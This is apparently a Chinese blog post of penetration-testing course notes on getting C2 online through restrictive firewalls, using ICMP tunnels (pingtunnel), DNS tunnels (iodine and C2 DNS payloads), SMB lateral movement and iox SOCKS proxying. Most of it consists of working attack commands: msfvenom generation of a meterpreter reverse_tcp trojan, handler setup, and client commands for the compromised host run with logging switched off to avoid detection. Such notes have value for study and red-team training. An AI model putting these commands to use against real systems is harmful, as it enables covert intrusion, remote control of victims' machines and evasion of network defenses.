173天隧道技术篇&防火墙组策略&ICMP&DNS&SMB协议&出网判断&C2上线&解决方案

主要学习的是icmp隧道的搭建

分别的C2的icmp隧道搭建和msf隧道搭建
以及要了解C2支持的各种协议
如何判断主机支持什么协议

Icmp  使用ping ip or domain
Ssh 用ssh连接  ip or domain
Dns 用 nslookup  domain
Http 用 curl ip
tcp用  telnet ip orport

icmp隧道搭建使用工具

使用pingtunnel工具进行搭建隧道 https://github.com/esrrhs/pingtunnel
使用参考文章:https://www.freebuf.com/articles/network/282244.html

# windows操作系统【不太好使】
pingtunnel.exe -type client -l :监听本机的端口(随便写) -s pingtunnel服务端地址 -t 隧道目标地址:端口 -tcp 1
# windows操作系统【不太好使】
./pingtunnel -type client -l :监听本机的端口(随便写) -s pingtunnel服务端地址 -t 隧道目标地址:端口 -tcp 1

监听器与后门的配置
第一条命令是在pingtunnel服务端上运行的,第二条是在客户端上运行的,也就是说得把pingtunnel上传到被攻击的主机上去 注意点是 需要一点要加上 noprint nolog
image

DNS上线

如果是使用C2搭建DNS隧道,这边是不需要搭建的,因为C2自身支持生成DNS的payload
分别支持
image
需要创建三个域名
image
创建监听器的时候加上
image

可以使用checkin 和 mode dns-txt 加快dns进程
image

DNS隧道搭建

使用工具iodine https://github.com/yarrick/iodine
DNS上的配置 注意是A记录
image

服务端

iodined -f -c -P 1 192.168.0.1 ns1.mak4r1.com -DD  #服务端
-P是连接密码,写一个密码就行
192.168.0.1是虚拟网卡中受害机的虚拟ip
ns1.mak4r1.com是NS记录里待查询的域名

客户端

iodine -f -P 1 ns1.mak4r1.com -M 200 
回显Connection setup complete, transmitting data.就是OK的,这时候ping 192.168.0.1能ping通说明连接成功

MSF搭建icmp隧道

仍然是使用pingtunnel

服务端
./pingtunnel -type server  
客户端
pingtunnel -type client -l :3333 -s 192.168.139.141 -t 192.168.139.141:3344 -tcp 1 -noprint 1 -nolog 1 

生成木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=3333 -f exe -o msf.exe

MSF监听器配置

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3344
run

SMB横向移动

445端口开放代表SMB协议开放
适用场景:防火墙放行的WEB入口打不下来利用放行的SMB移动获取权限
利用条件:密码喷射或已知口令的情况下直接正向SMB横向移动拿下
注意是先通过信息收集到账号密码,然后进行端口扫描发现开放smb 最后进行横向移动
image

ICMP穿透-Pingtunel配合iox代理Socks内网穿透

iox的地址
https://github.com/EddieIvan01/iox
这个是解决拿下的主机只是允许icmp出,我们要访问该主机的其他网址该如何拿下,就是利用iox启用socks代理,然后用pingtunnel搭建icmp,然后把该socks节点转成成icmp隧道出去

服务端:

./pingtunnel -type server -noprint 1 -nolog 1 -key 000000
./iox.exe proxy -l 4455 -l 5566

客户端:(被攻击机):

pingtunnel -type client -l 127.0.0.1:2222 -s 192.168.139.141 -t 192.168.139.141:4455 -tcp 1 -noprint 1 -nolog 1 -key 000000(先执行)
iox.exe proxy -r 127.0.0.1:2222(后执行)

iox工具的使用

代理模式

./iox proxy -l 9999 -l 1080 vps上执行 将 9999端口的内容转发到1080上
./iox proxy -r vps:9999  而后在proxy上配置socks代理即可

内网穿透模式
注意在vps上开放端口和防火墙
image

posted @ 2025-10-26 12:23  JuneCy  阅读(8)  评论(0)    收藏  举报